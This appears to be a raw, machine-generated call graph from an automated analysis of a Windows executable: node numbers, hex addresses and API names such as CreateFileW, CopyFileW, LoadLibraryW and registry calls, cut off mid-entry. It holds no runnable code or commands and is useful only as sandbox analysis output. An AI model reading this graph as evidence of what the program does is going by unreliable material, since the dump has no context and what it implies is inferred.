21858 4094d3 ??2@YAPAXI 21856->21858 21857->21856 21859 4094fc ??2@YAPAXI 21858->21859 21861 409531 21859->21861 21862 40952c 21859->21862 21864 409552 21861->21864 21865 409545 DeleteObject 21861->21865 21926 4026fa memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 21862->21926 21918 404d08 21864->21918 21865->21864 21867 409557 21921 401000 21867->21921 21871 4095a1 21872 4055e9 21871->21872 21928 40543b free free 21872->21928 21876 40551c malloc memcpy free free 21882 405624 21876->21882 21877 405711 21885 40573a 21877->21885 21950 40551c 21877->21950 21879 4056ad free 21879->21882 21882->21876 21882->21877 21882->21879 21882->21885 21929 405461 wcslen 21882->21929 21942 404ae7 21882->21942 21884 405461 7 API calls 21884->21885 21939 405552 21885->21939 21886 405766 21887 40578d 21886->21887 21888 40576e 21886->21888 21887->21816 21887->21817 21888->21887 21889 405777 _wcsicmp 21888->21889 21889->21887 21889->21888 21955 4064dc GetModuleFileNameW wcsrchr wcscat 21890->21955 21892 406434 21956 40637c GetFileAttributesW GetPrivateProfileStringW wcscpy wcscpy GetPrivateProfileIntW 21892->21956 21894 40643c 21894->21824 21957 40201c 21895->21957 21897 409716 21897->21820 21897->21828 21898 409681 _wcsicmp 21899 409656 21898->21899 21899->21897 21899->21898 21901 4096b6 21899->21901 22012 4095a8 7 API calls 21899->22012 21901->21897 21960 408cc1 21901->21960 21905 4096ca 21977 40226e 21905->21977 21982 40244f memset 21905->21982 21906 4096de SetCursor 21907 4096f7 21906->21907 21996 407d38 21907->21996 21913->21820 21914->21834 21915->21827 21916->21832 21917->21807 21927 404be5 memset wcscpy 21918->21927 21920 404d1f CreateFontIndirectW 21920->21867 21922 401037 21921->21922 21923 40103b GetModuleHandleW LoadIconW 21922->21923 21924 40100e wcsncat 21922->21924 21925 401561 wcscpy 21923->21925 21924->21922 21925->21871 21926->21861 21927->21920 21928->21882 21930 405498 21929->21930 21931 40548f free 21929->21931 21933 404ae7 3 API calls 21930->21933 21932 4054a2 21931->21932 21934 4054b2 free 21932->21934 21935 4054bb 21932->21935 21933->21932 21936 4054c7 memcpy 21934->21936 21937 404ae7 3 API calls 21935->21937 21936->21882 21938 4054c6 21937->21938 21938->21936 21940 405562 21939->21940 21941 405558 free 21939->21941 21940->21886 21941->21940 21943 404b34 21942->21943 21944 404aee 21942->21944 21943->21882 21944->21944 21945 404afd malloc 21944->21945 21946 404b2a 21945->21946 21947 404b0f 21945->21947 21946->21882 21948 404b23 free 21947->21948 21949 404b13 memcpy 21947->21949 21948->21946 21949->21948 21951 405535 21950->21951 21952 40552a free 21950->21952 21954 404ae7 3 API calls 21951->21954 21953 405540 21952->21953 21953->21884 21954->21953 21955->21892 21956->21894 22014 406925 21957->22014 21961 408cde memset GetModuleFileNameW wcsrchr 21960->21961 21975 408e46 21960->21975 21962 408d21 21961->21962 21963 408d24 wcscat 21961->21963 21962->21963 22054 40a70b wcscpy wcscpy 21963->22054 21969 408dd2 21970 405766 _wcsicmp 21969->21970 21969->21975 21971 408deb 21970->21971 21971->21975 22065 404ab9 wcslen memcpy 21971->22065 21973 408e23 22066 404ab9 wcslen memcpy 21973->22066 21976 40479f LoadCursorW SetCursor 21975->21976 21976->21905 22068 40212b memset _snwprintf memset wcslen wcslen 21977->22068 21980 40212b 265 API calls 21981 402292 21980->21981 21981->21906 21983 4024a1 wcslen wcslen 21982->21983 21984 402535 21982->21984 21986 4024c9 21983->21986 21990 4024d8 21983->21990 22311 40a919 21984->22311 22324 404d63 wcslen wcscat wcscpy wcscat 21986->22324 21988 40226e 265 API calls 21991 4024f3 wcslen wcslen 21988->21991 21989 40226e 265 API calls 21992 40254f 21989->21992 21990->21988 21993 402512 21991->21993 21994 402527 21991->21994 21992->21906 22325 404d63 wcslen wcscat wcscpy wcscat 21993->22325 21994->21989 22331 406b39 ??2@YAPAXI 21996->22331 21998 407d4a 22336 404857 CreateFileW 21998->22336 22000 407d52 22001 407d61 22000->22001 22002 407e32 22000->22002 22004 407d78 22001->22004 22337 40523f WriteFile 22001->22337 22340 4048b7 9 API calls 22002->22340 22338 40479f LoadCursorW SetCursor 22004->22338 22006 407e3b 22013 408e80 13 API calls 22006->22013 22008 407de7 CloseHandle SetCursor 22008->22006 22010 407d87 22010->22008 22339 4048b7 9 API calls 22010->22339 22012->21899 22013->21897 22015 406936 22014->22015 22027 406714 22015->22027 22018 406992 memcpy memcpy 22025 4069dd 22018->22025 22019 4059fd 16 API calls 22019->22025 22020 406a18 ??2@YAPAXI ??2@YAPAXI 22021 406a54 ??2@YAPAXI 22020->22021 22023 406a8b 22020->22023 22021->22023 22023->22023 22037 4068a5 22023->22037 22025->22018 22025->22019 22025->22020 22026 40202b 22026->21899 22028 406726 22027->22028 22029 40671f ??3@YAXPAX 22027->22029 22030 406734 22028->22030 22031 40672d ??3@YAXPAX 22028->22031 22029->22028 22032 406745 22030->22032 22033 40673e ??3@YAXPAX 22030->22033 22031->22030 22034 406765 ??2@YAPAXI ??2@YAPAXI 22032->22034 22035 406755 ??3@YAXPAX 22032->22035 22036 40675e ??3@YAXPAX 22032->22036 22033->22032 22034->22018 22035->22036 22036->22034 22038 405552 free 22037->22038 22039 4068ae 22038->22039 22040 405552 free 22039->22040 22041 4068b6 22040->22041 22042 405552 free 22041->22042 22043 4068be 22042->22043 22044 405552 free 22043->22044 22045 4068c6 22044->22045 22046 40551c 4 API calls 22045->22046 22047 4068d9 22046->22047 22048 40551c 4 API calls 22047->22048 22049 4068e3 22048->22049 22050 40551c 4 API calls 22049->22050 22051 4068ed 22050->22051 22052 40551c 4 API calls 22051->22052 22053 4068f7 22052->22053 22053->22026 22055 408d64 22054->22055 22056 40a739 CreateFileW CloseHandle 22054->22056 22057 401653 22055->22057 22056->22055 22058 401684 memset 22057->22058 22059 401664 22057->22059 22060 401697 22058->22060 22059->22060 22061 40166e GetWindowPlacement 22059->22061 22062 4016b7 22060->22062 22067 4016ba GetSystemMetrics GetSystemMetrics SetWindowPos 22060->22067 22061->22060 22064 40683a SendMessageW memset SendMessageW 22062->22064 22064->21969 22065->21973 22066->21975 22067->22062 22069 4021c2 22068->22069 22070 4021ae 22068->22070 22083 404b83 GetFileAttributesW 22069->22083 22125 404d63 wcslen wcscat wcscpy wcscat 22070->22125 22073 4021d5 22074 4021ed _snwprintf wcslen wcslen 22073->22074 22084 401922 22073->22084 22076 402226 22074->22076 22077 40223a 22074->22077 22126 404d63 wcslen wcscat wcscpy wcscat 22076->22126 22124 404b83 GetFileAttributesW 22077->22124 22080 40224d 22081 402265 22080->22081 22082 401922 257 API calls 22080->22082 22081->21980 22082->22081 22083->22073 22127 42b210 22084->22127 22086 40192f memset CreateFileW 22087 40198a CloseHandle 22086->22087 22088 40196a 22086->22088 22090 401991 22087->22090 22181 404b38 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 22088->22181 22092 4019a7 memset WideCharToMultiByte 22090->22092 22182 402812 9 API calls 22090->22182 22091 40197a CopyFileW 22091->22090 22129 42ab08 22092->22129 22096 401c91 22098 401ca7 22096->22098 22099 401c9a DeleteFileW 22096->22099 22097 421e76 127 API calls 22100 401a0f 22097->22100 22098->22074 22099->22098 22101 401c87 22100->22101 22102 41637d 127 API calls 22100->22102 22190 42a482 83 API calls 22101->22190 22104 401a23 22102->22104 22105 401c7f 22104->22105 22106 401a31 memset 22104->22106 22109 4165d1 28 API calls 22104->22109 22110 416554 25 API calls 22104->22110 22113 405422 MultiByteToWideChar 22104->22113 22116 4165ad 26 API calls 22104->22116 22118 401b80 LoadLibraryW 22104->22118 22120 401b62 22104->22120 22121 401c08 memset memcpy MultiByteToWideChar LocalFree 22104->22121 22123 41637d 127 API calls 22104->22123 22184 4141f3 19 API calls 22104->22184 22185 4018b3 SystemTimeToFileTime FileTimeToLocalFileTime 22104->22185 22186 4161f6 25 API calls 22104->22186 22187 414a31 25 API calls 22104->22187 22189 4161c6 90 API calls 22105->22189 22183 4165d1 28 API calls 22106->22183 22109->22104 22110->22104 22113->22104 22116->22104 22119 401b94 GetProcAddress 22118->22119 22118->22120 22119->22120 22120->22104 22122 401bcc FreeLibrary 22120->22122 22188 40315b 78 API calls 22120->22188 22121->22104 22122->22104 22123->22104 22124->22080 22125->22069 22126->22077 22128 42b217 22127->22128 22128->22086 22128->22128 22130 40b358 11 API calls 22129->22130 22131 42ab17 22130->22131 22134 42ad32 22131->22134 22227 40b2b6 11 API calls 22131->22227 22133 42ab2b 22136 42ab33 22133->22136 22137 42ab41 22133->22137 22135 4019eb 22134->22135 22232 42a482 83 API calls 22134->22232 22135->22096 22135->22097 22139 40b168 4 API calls 22136->22139 22191 40b344 RtlEnterCriticalSection GetCurrentThreadId 22137->22191 22141 42ab39 22139->22141 22141->22134 22142 42ab48 memcpy 22192 40afb4 13 API calls 22142->22192 22144 42abc7 22145 42abce 22144->22145 22146 42abec 22144->22146 22228 40c04b 25 API calls 22145->22228 22193 42a9ea 31 API calls 22146->22193 22149 42abe4 RtlLeaveCriticalSection 22149->22134 22150 42ac00 22194 42a9ea 31 API calls 22150->22194 22153 42ac0a 22195 42a9ea 31 API calls 22153->22195 22155 42ac14 22196 42a9ea 31 API calls 22155->22196 22157 42ac24 22157->22149 22197 41df36 17 API calls 22157->22197 22159 42ac44 22198 42a9ea 31 API calls 22159->22198 22161 42ac59 22199 41df36 17 API calls 22161->22199 22163 42ac6c 22164 42ac73 22163->22164 22200 42a8fb 22163->22200 22164->22163 22167 42acb3 22204 41e131 11 API calls 22167->22204 22168 42aca0 22229 40c04b 25 API calls 22168->22229 22171 42acbf 22205 41e131 11 API calls 22171->22205 22173 42acce 22173->22149 22206 40c04b 25 API calls 22173->22206 22175 42acfd 22207 41fe26 22175->22207 22179 42ad0a 22179->22149 22231 40c04b 25 API calls 22179->22231 22181->22091 22182->22092 22183->22104 22184->22104 22185->22104 22186->22104 22187->22104 22188->22120 22189->22101 22190->22096 22191->22142 22192->22144 22193->22150 22194->22153 22195->22155 22196->22157 22197->22159 22198->22161 22199->22163 22201 42a908 22200->22201 22233 410b9a 22201->22233 22204->22171 22205->22173 22206->22175 22212 41fe31 22207->22212 22209 41fe5e strlen 22296 41df67 22209->22296 22211 41feaa 22213 42a7bb 28 API calls 22211->22213 22212->22209 22212->22211 22283 42a7bb 22212->22283 22214 41febf 22213->22214 22215 42a7bb 28 API calls 22214->22215 22220 41fed7 22215->22220 22216 42a7bb 28 API calls 22216->22220 22217 41ff0e strlen 22218 41df67 16 API calls 22217->22218 22218->22220 22219 41ff54 22221 42a7bb 28 API calls 22219->22221 22222 41ff7b 22219->22222 22220->22216 22220->22217 22220->22219 22221->22219 22223 41ff87 22222->22223 22305 42a893 30 API calls 22222->22305 22306 41ffcf 29 API calls 22223->22306 22226 41ff97 22230 421644 26 API calls 22226->22230 22227->22133 22228->22149 22229->22149 22230->22179 22231->22149 22232->22135 22234 40b358 11 API calls 22233->22234 22235 410bb1 22234->22235 22236 410bbb 22235->22236 22237 40b358 11 API calls 22235->22237 22236->22167 22236->22168 22238 410bcc 22237->22238 22244 410bd3 22238->22244 22255 40eb21 22238->22255 22240 410c24 22243 410c2e memset 22240->22243 22240->22244 22241 410be9 22242 40b168 4 API calls 22241->22242 22245 410bef 22242->22245 22246 410c4f 22243->22246 22251 410c5c 22243->22251 22244->22241 22280 40f08d 24 API calls 22244->22280 22248 40b168 4 API calls 22245->22248 22249 40aef9 4 API calls 22246->22249 22248->22236 22249->22251 22250 410c7a 22253 410cd6 22250->22253 22281 40ee28 13 API calls 22250->22281 22251->22244 22251->22250 22282 40ee28 13 API calls 22253->22282 22256 40b0a5 11 API calls 22255->22256 22257 40eb65 22256->22257 22258 40eba8 strlen 22257->22258 22259 40eb9b 22257->22259 22278 40eba0 22257->22278 22261 40ebc1 22258->22261 22260 40b168 4 API calls 22259->22260 22260->22278 22262 40ebcb 22261->22262 22263 40ebdd strlen 22261->22263 22265 40b168 4 API calls 22262->22265 22264 40b358 11 API calls 22263->22264 22266 40ec01 22264->22266 22265->22278 22266->22262 22267 40ec0d memcpy memcpy 22266->22267 22268 40b168 4 API calls 22267->22268 22270 40ec84 22268->22270 22269 40b358 11 API calls 22271 40ec9b 22269->22271 22270->22271 22276 40ecbb 22270->22276 22279 40d302 16 API calls 22270->22279 22272 40ee0a 22271->22272 22273 40ed2a memcpy strlen 22271->22273 22275 40b168 4 API calls 22272->22275 22274 40ed66 memcpy memcpy 22273->22274 22277 40ed4b 22273->22277 22274->22278 22275->22278 22276->22269 22276->22271 22277->22274 22278->22240 22279->22276 22280->22241 22281->22253 22282->22236 22284 42a83c 22283->22284 22286 42a7c6 22283->22286 22308 40c04b 25 API calls 22284->22308 22286->22284 22287 42a7df strlen 22286->22287 22287->22284 22288 42a7f2 22287->22288 22289 41df67 16 API calls 22288->22289 22290 42a800 22289->22290 22292 42a81f 22290->22292 22293 42a852 22290->22293 22291 41df67 16 API calls 22294 42a82b 22291->22294 22307 40c04b 25 API calls 22292->22307 22293->22291 22294->22212 22299 41df7a 22296->22299 22297 41e064 22297->22212 22299->22297 22309 40b37e 12 API calls 22299->22309 22300 41e010 22300->22297 22301 41e017 memcpy 22300->22301 22310 40cb45 14 API calls 22301->22310 22303 41e051 22303->22297 22304 40b168 4 API calls 22303->22304 22304->22297 22305->22223 22306->22226 22307->22294 22308->22294 22309->22300 22310->22303 22312 40a8ea 2 API calls 22311->22312 22313 40a928 22312->22313 22314 40a932 22313->22314 22315 40a944 memset 22313->22315 22326 404d2e 22314->22326 22329 40a67a RegOpenKeyExW 22315->22329 22319 40a96b 22321 40a996 wcscpy 22319->22321 22330 40a695 RegQueryValueExW 22319->22330 22320 40a9ad 22320->21994 22321->22320 22323 40a98a RegCloseKey 22323->22321 22324->21990 22325->21994 22327 404d3d GetVersionExW 22326->22327 22328 404d4e SHGetSpecialFolderPathW 22326->22328 22327->22328 22328->22320 22329->22319 22330->22323 22332 406b6b 22331->22332 22335 406bb2 ??3@YAXPAX 22331->22335 22332->22335 22341 406afe SendMessageW 22332->22341 22335->21998 22336->22000 22337->22004 22338->22010 22339->22008 22340->22006 22341->22332 22452 402295 strlen WriteFile 22453 428a95 28 API calls 22457 40109f 37 API calls 22459 41f49e 27 API calls 22460 4026a2 wcslen WriteFile 22462 4168c7 94 API calls 22464 4296aa 20 API calls 22465 40d0af 23 API calls 22467 42b4b0 FreeLibrary 22468 41fab2 26 API calls 22469 428c29 12 API calls 22471 41fcb4 28 API calls 22472 407eb7 8 API calls 22473 41eab9 25 API calls 22476 4289cc 33 API calls 22478 401543 GetSystemMetrics GetSystemMetrics 73A1A570 GetWindowRect MoveWindow 22480 42894b 14 API calls 22483 402554 38 API calls 22484 402756 SendMessageW modf 22485 406159 11 API calls 22487 40a75b WritePrivateProfileStringW 22488 40915d 13 API calls 22489 40c95d memcmp 22491 417b61 55 API calls 22493 42ad60 _ftol 22495 4168c7 89 API calls 21113 428b73 21116 4242f4 21113->21116 21117 42431b 21116->21117 21118 424d84 21116->21118 21117->21118 21119 42432d memset 21117->21119 21120 42434d 21119->21120 21270 423eac 21120->21270 21122 424514 21123 40b168 4 API calls 21122->21123 21125 424d7b 21123->21125 21126 40b168 4 API calls 21125->21126 21126->21118 21128 4244ed 21132 42450d 21128->21132 21372 423ae4 25 API calls 21128->21372 21129 424548 21130 42458c 21129->21130 21374 422834 27 API calls 21129->21374 21134 4245b4 21130->21134 21376 414bbd 16 API calls 21130->21376 21132->21122 21132->21129 21373 41997a 17 API calls 21132->21373 21298 414c03 21134->21298 21136 42456a 21375 414bd4 19 API calls 21136->21375 21140 4243ba 21140->21122 21140->21128 21142 4242f4 160 API calls 21140->21142 21142->21140 21144 4245cf 21145 4245fe 21144->21145 21377 422834 27 API calls 21144->21377 21147 424676 21145->21147 21149 424614 21145->21149 21151 414c03 16 API calls 21147->21151 21148 4245ed 21378 414bd4 19 API calls 21148->21378 21328 4275a0 21149->21328 21152 42467d memset 21151->21152 21160 4246b5 21152->21160 21154 42464a 21380 4225f9 45 API calls 21154->21380 21158 424668 21381 4281a1 16 API calls 21158->21381 21160->21122 21162 42474c 21160->21162 21171 424c06 21160->21171 21161 42466e 21167 424d43 21161->21167 21430 4228c6 16 API calls 21161->21430 21164 414c03 16 API calls 21162->21164 21166 424753 21164->21166 21165 424c16 21421 424068 32 API calls 21165->21421 21168 414c03 16 API calls 21166->21168 21167->21122 21431 422cc1 30 API calls 21167->21431 21172 42475d 21168->21172 21171->21165 21420 41997a 17 API calls 21171->21420 21175 414c03 16 API calls 21172->21175 21173 424c6e 21176 4275a0 53 API calls 21173->21176 21177 424767 21175->21177 21178 424c81 21176->21178 21382 422834 27 API calls 21177->21382 21180 424c97 21178->21180 21181 424c8a 21178->21181 21423 424187 45 API calls 21180->21423 21422 419e47 15 API calls 21181->21422 21182 424786 21383 414bd4 19 API calls 21182->21383 21186 424ca5 21188 424cc2 21186->21188 21424 414b25 16 API calls 21186->21424 21187 4247a0 21384 414b25 16 API calls 21187->21384 21425 4281a1 16 API calls 21188->21425 21192 424ccb 21426 424134 19 API calls 21192->21426 21193 4247e1 21385 414b25 16 API calls 21193->21385 21196 424cd9 21199 424cf1 21196->21199 21427 41b7b2 45 API calls 21196->21427 21197 4247ef 21386 414b25 16 API calls 21197->21386 21428 4225f9 45 API calls 21199->21428 21200 424800 21387 414b25 16 API calls 21200->21387 21204 424d0e 21429 419e47 15 API calls 21204->21429 21205 424815 21388 414b25 16 API calls 21205->21388 21208 424821 21389 414bbd 16 API calls 21208->21389 21210 424837 21390 414b25 16 API calls 21210->21390 21212 424846 21391 424134 19 API calls 21212->21391 21214 424856 21215 42486b 21214->21215 21392 41b7b2 45 API calls 21214->21392 21393 4225f9 45 API calls 21215->21393 21218 42488c 21394 414b25 16 API calls 21218->21394 21220 42489b 21395 424068 32 API calls 21220->21395 21222 4248ae 21396 414b25 16 API calls 21222->21396 21224 4248ba 21397 414b25 16 API calls 21224->21397 21226 4248d5 21227 4275a0 53 API calls 21226->21227 21229 4248e6 21227->21229 21228 424abc 21238 424b1e 21228->21238 21408 414b25 16 API calls 21228->21408 21409 414e06 16 API calls 21228->21409 21229->21122 21266 4248fb 21229->21266 21398 41b534 45 API calls 21229->21398 21232 424957 21399 414bbd 16 API calls 21232->21399 21236 424b5b 21411 414b25 16 API calls 21236->21411 21238->21236 21410 41aae2 16 API calls 21238->21410 21240 424b6e 21412 414bbd 16 API calls 21240->21412 21242 4249df 21402 414b25 16 API calls 21242->21402 21244 424b7d 21413 414b25 16 API calls 21244->21413 21248 424b8e 21414 424187 45 API calls 21248->21414 21249 4249f8 21403 414bbd 16 API calls 21249->21403 21250 42496f 21250->21242 21400 41a9d1 37 API calls 21250->21400 21401 414bbd 16 API calls 21250->21401 21254 424ba9 21415 414b25 16 API calls 21254->21415 21256 424a0a 21404 4281a1 16 API calls 21256->21404 21258 424bbb 21259 424bc3 21258->21259 21260 424bda 21258->21260 21416 414bbd 16 API calls 21259->21416 21417 4281a1 16 API calls 21260->21417 21261 424a36 21405 414bbd 16 API calls 21261->21405 21265 424bd5 21419 414b25 16 API calls 21265->21419 21266->21228 21406 414b25 16 API calls 21266->21406 21407 41b3e5 45 API calls 21266->21407 21267 424be2 21418 414dd5 free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId memset 21267->21418 21271 423ec9 21270->21271 21286 423ec2 21270->21286 21271->21286 21432 4230d6 21271->21432 21274 423eea memset 21453 41a804 19 API calls 21274->21453 21276 423f0a 21276->21286 21454 41a804 19 API calls 21276->21454 21278 423f1a 21280 423f79 21278->21280 21278->21286 21455 41a804 19 API calls 21278->21455 21282 423f9f 21280->21282 21457 41a804 19 API calls 21280->21457 21456 40c0cc 19 API calls 21282->21456 21283 423fc9 21283->21286 21458 41a804 19 API calls 21283->21458 21286->21122 21294 423751 21286->21294 21287 423fd5 21287->21286 21288 423ff2 21287->21288 21459 42361e 26 API calls 21287->21459 21288->21286 21460 42361e 26 API calls 21288->21460 21291 42400c 21291->21282 21291->21286 21292 42403f 21291->21292 21292->21286 21293 423eac 138 API calls 21292->21293 21293->21286 21295 423760 21294->21295 21296 423758 21294->21296 21295->21140 21735 414a57 12 API calls 21296->21735 21299 414c2e 21298->21299 21300 414c18 21298->21300 21302 423765 21299->21302 21736 40b3e1 16 API calls 21300->21736 21303 4237c2 21302->21303 21304 42377b 21302->21304 21307 423751 12 API calls 21303->21307 21327 42386f 21303->21327 21305 423751 12 API calls 21304->21305 21306 42378e 21305->21306 21306->21327 21737 41b3e5 45 API calls 21306->21737 21308 4237eb 21307->21308 21308->21327 21740 41b3e5 45 API calls 21308->21740 21310 4237a4 21738 414ba6 16 API calls 21310->21738 21313 423801 21741 414ba6 16 API calls 21313->21741 21314 4237b3 21739 414bbd 16 API calls 21314->21739 21317 423811 21742 414ba6 16 API calls 21317->21742 21319 42381b 21743 414b25 16 API calls 21319->21743 21321 42382c 21321->21327 21744 414b25 16 API calls 21321->21744 21323 423853 21745 414ba6 16 API calls 21323->21745 21325 42385f 21746 414b25 16 API calls 21325->21746 21327->21144 21329 4275e0 memset 21328->21329 21330 4275c9 21328->21330 21334 42763c 21329->21334 21747 40c0cc 19 API calls 21330->21747 21333 424627 21333->21122 21333->21154 21379 414dd5 free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId memset 21333->21379 21748 4264de 16 API calls 21334->21748 21336 427650 21749 40b37e 12 API calls 21336->21749 21338 427667 21339 4276fb 21338->21339 21340 414c03 16 API calls 21338->21340 21355 427714 21339->21355 21752 42641c 15 API calls 21339->21752 21344 42768d 21340->21344 21342 42770f 21753 427570 free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 21342->21753 21346 4276b7 21344->21346 21750 41b7b2 45 API calls 21344->21750 21346->21339 21751 42694d 23 API calls 21346->21751 21349 4278b1 21755 41dc43 17 API calls 21349->21755 21350 428186 21764 42641c 15 API calls 21350->21764 21353 414c03 16 API calls 21369 427a0b 21353->21369 21355->21349 21754 426ed5 27 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21355->21754 21361 4278e9 21361->21369 21756 41e258 17 API calls 21361->21756 21757 41dcfa 28 API calls 21361->21757 21758 414b25 16 API calls 21361->21758 21759 414bd4 19 API calls 21361->21759 21760 41dc43 17 API calls 21361->21760 21363 42670b 27 API calls 21363->21369 21365 41b7b2 45 API calls 21365->21369 21366 414bbd 16 API calls 21366->21369 21367 427413 19 API calls 21367->21369 21368 41b3e5 45 API calls 21368->21369 21369->21350 21369->21353 21369->21363 21369->21365 21369->21366 21369->21367 21369->21368 21370 414bd4 19 API calls 21369->21370 21371 414b25 16 API calls 21369->21371 21761 42744b 45 API calls 21369->21761 21762 41b3aa 45 API calls 21369->21762 21763 4274ad 45 API calls 21369->21763 21370->21369 21371->21369 21372->21132 21373->21129 21374->21136 21375->21130 21376->21134 21377->21148 21378->21145 21379->21154 21380->21158 21381->21161 21382->21182 21383->21187 21384->21193 21385->21197 21386->21200 21387->21205 21388->21208 21389->21210 21390->21212 21391->21214 21392->21215 21393->21218 21394->21220 21395->21222 21396->21224 21397->21226 21398->21232 21399->21250 21400->21250 21401->21250 21402->21249 21403->21256 21404->21261 21405->21266 21406->21266 21407->21266 21408->21228 21409->21228 21410->21238 21411->21240 21412->21244 21413->21248 21414->21254 21415->21258 21416->21265 21417->21267 21418->21265 21419->21161 21420->21165 21421->21173 21422->21122 21423->21186 21424->21188 21425->21192 21426->21196 21427->21199 21428->21204 21429->21161 21430->21167 21431->21122 21435 4230f4 21432->21435 21438 42325e 21432->21438 21433 42318b 21473 42227a 23 API calls 21433->21473 21435->21433 21435->21438 21461 41c77c 21435->21461 21471 41d732 139 API calls 21435->21471 21472 419bd5 17 API calls 21435->21472 21437 4234e3 21437->21438 21479 40c0cc 19 API calls 21437->21479 21438->21274 21438->21286 21440 4234dc 21478 419e47 15 API calls 21440->21478 21445 40c0cc 19 API calls 21451 423197 21445->21451 21446 40b168 4 API calls 21446->21451 21447 419512 16 API calls 21447->21451 21448 422119 20 API calls 21448->21451 21449 419cac 21 API calls 21449->21451 21451->21437 21451->21438 21451->21440 21451->21445 21451->21446 21451->21447 21451->21448 21451->21449 21452 4233ff strlen 21451->21452 21474 41cb8f 12 API calls 21451->21474 21475 40be35 21451->21475 21452->21451 21453->21276 21454->21278 21455->21278 21456->21286 21457->21283 21458->21287 21459->21288 21460->21291 21480 421bae 21461->21480 21466 41c7c4 21489 40c0cc 19 API calls 21466->21489 21467 41c7ad 21488 40c0cc 19 API calls 21467->21488 21470 41c78c 21470->21435 21471->21435 21472->21435 21473->21451 21474->21451 21711 40bdbc 21475->21711 21478->21437 21479->21438 21481 41c788 21480->21481 21482 421bba 21480->21482 21481->21470 21484 41c70f 21481->21484 21490 421b12 21482->21490 21485 41c720 21484->21485 21487 41c775 21484->21487 21486 41c746 strlen 21485->21486 21485->21487 21486->21485 21487->21466 21487->21467 21487->21470 21488->21470 21489->21470 21491 421b94 21490->21491 21493 421b3a 21490->21493 21491->21481 21493->21491 21495 42182f 21493->21495 21529 41c8c3 17 API calls 21493->21529 21530 421733 21495->21530 21498 41c70f strlen 21499 421899 21498->21499 21500 421878 21499->21500 21549 40b358 21499->21549 21500->21493 21505 4218e9 21506 42195e memset 21505->21506 21514 4218ee 21505->21514 21509 42196f 21506->21509 21507 42193d 21507->21509 21507->21514 21516 42199f 21509->21516 21589 41df36 17 API calls 21509->21589 21510 421916 21510->21507 21588 413932 55 API calls 21510->21588 21513 4219af 21590 40b4a0 16 API calls 21513->21590 21587 40b4a0 16 API calls 21514->21587 21516->21513 21520 421a49 21516->21520 21518 421af1 21519 40b168 4 API calls 21518->21519 21519->21500 21521 421a61 21520->21521 21522 40be35 19 API calls 21520->21522 21524 42190e 21521->21524 21591 41c8c3 17 API calls 21521->21591 21523 421a80 21522->21523 21557 4213a0 21523->21557 21592 411369 24 API calls 21524->21592 21528 40b168 4 API calls 21528->21521 21529->21493 21531 421761 21530->21531 21532 421777 21530->21532 21593 4216e7 16 API calls 21531->21593 21532->21531 21534 42178a 21532->21534 21548 42176f 21532->21548 21535 4217ef 21534->21535 21538 421796 atoi 21534->21538 21536 421801 21535->21536 21537 4217f5 21535->21537 21596 41c7e0 strlen 21536->21596 21595 4216e7 16 API calls 21537->21595 21541 4213a0 125 API calls 21538->21541 21545 4217b6 21541->21545 21542 42180d 21543 42181b atoi 21542->21543 21542->21548 21543->21548 21544 4217c9 21547 40b168 4 API calls 21544->21547 21545->21544 21545->21548 21594 4216e7 16 API calls 21545->21594 21547->21548 21548->21498 21548->21500 21550 40b0a5 10 API calls 21549->21550 21551 40b363 21550->21551 21552 40b379 21551->21552 21553 40b36a memset 21551->21553 21552->21500 21554 411345 21552->21554 21553->21552 21597 411249 21554->21597 21558 4213c3 21557->21558 21559 4213ca 21557->21559 21558->21528 21620 40b344 RtlEnterCriticalSection GetCurrentThreadId 21559->21620 21561 421597 21563 4215b5 21561->21563 21656 4161c6 90 API calls 21561->21656 21565 4215c5 21563->21565 21566 40b168 4 API calls 21563->21566 21657 40b517 25 API calls 21565->21657 21566->21565 21568 421621 21570 42162b RtlLeaveCriticalSection 21568->21570 21570->21558 21571 4215d2 21571->21568 21571->21570 21658 42a958 26 API calls 21571->21658 21574 4215f2 strlen 21576 40b0a5 11 API calls 21574->21576 21579 421602 21576->21579 21577 40b168 4 API calls 21583 4213d5 21577->21583 21579->21570 21659 42a958 26 API calls 21579->21659 21581 421574 isspace 21581->21583 21583->21561 21583->21577 21583->21581 21621 421e76 21583->21621 21628 41637d 21583->21628 21650 40b37e 12 API calls 21583->21650 21651 4165ef 26 API calls 21583->21651 21652 4165d1 28 API calls 21583->21652 21653 416554 25 API calls 21583->21653 21654 4165ad 26 API calls 21583->21654 21655 4161c6 90 API calls 21583->21655 21585 421613 memcpy 21585->21570 21587->21524 21588->21510 21589->21516 21590->21524 21591->21524 21592->21518 21593->21548 21594->21544 21595->21548 21596->21542 21598 411263 21597->21598 21599 41127d 21597->21599 21600 411269 21598->21600 21618 413293 55 API calls 21598->21618 21599->21600 21602 4112a3 21599->21602 21611 411013 21599->21611 21600->21505 21600->21510 21601 4112dd 21604 410aea 55 API calls 21601->21604 21607 4112e1 21601->21607 21602->21600 21602->21601 21606 40ee9a 4 API calls 21602->21606 21604->21607 21606->21601 21607->21600 21608 410b2e 24 API calls 21607->21608 21609 411308 21608->21609 21619 410f66 24 API calls 21609->21619 21612 411048 21611->21612 21616 411031 21611->21616 21612->21602 21613 410df6 56 API calls 21613->21616 21614 410f66 24 API calls 21614->21616 21615 40fae1 13 API calls 21615->21616 21616->21612 21616->21613 21616->21614 21616->21615 21617 410f91 61 API calls 21616->21617 21617->21616 21618->21599 21619->21600 21620->21583 21622 421e80 21621->21622 21623 421e84 21622->21623 21660 40b344 RtlEnterCriticalSection GetCurrentThreadId 21622->21660 21623->21583 21625 421e91 21661 421ccc memset 21625->21661 21629 416397 21628->21629 21630 41646a 21628->21630 21692 40b344 RtlEnterCriticalSection GetCurrentThreadId 21629->21692 21630->21583 21633 416473 21643 41644d 21633->21643 21709 416222 25 API calls 21633->21709 21634 421e76 125 API calls 21637 4163aa 21634->21637 21636 41645a RtlLeaveCriticalSection 21636->21630 21637->21633 21637->21634 21637->21643 21693 4162cf 21637->21693 21703 416647 6 API calls 21637->21703 21704 415875 89 API calls 21637->21704 21705 40b344 RtlEnterCriticalSection GetCurrentThreadId 21637->21705 21706 4157be 89 API calls 21637->21706 21707 414f50 14 API calls 21637->21707 21639 416499 21640 40b168 4 API calls 21639->21640 21642 4164a7 21640->21642 21642->21643 21710 40b438 13 API calls 21642->21710 21708 